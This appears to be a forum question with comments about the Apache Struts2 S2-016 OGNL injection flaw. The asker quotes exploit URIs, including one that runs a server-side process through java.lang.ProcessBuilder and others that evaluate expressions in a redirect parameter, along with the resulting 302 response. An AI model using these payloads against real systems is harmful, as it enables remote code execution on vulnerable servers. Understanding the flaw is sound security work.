# Struts S2-016 Injection vulenerability

Tags: java, security, struts2, code-injection, ognl

Can someone help me understand the result of this script ?

Actually there is no result after I'm typing this code within my app (Struts **2.2.1.1**).

> `http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}`

otherwise, this part works fine for me and I'm redirect to a new page:

Attack URI:

> ```
> /xxxx.action?redirect:http://www.google.com/%25{1000-1}
> ```

Response Header:

> ```
> HTTP/1.1 302 Found
> Location: http://www.google.com/999
> ```

Another one :

> ```
> http://host/struts2-showcase/employee/save.action?redirect:%25{3*4} <<< 12.jsp
> ```

Comment: Very nice youtube video : https://www.youtube.com/watch?v=_uOtF4SbaoQ

Comment: What are you asking? 1. script can start some process on server.

Comment: what is the result of %25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

Comment: See http://stackoverflow.com/q/6856028/1700321 and https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html.

Comment: thank you for your kind reply :)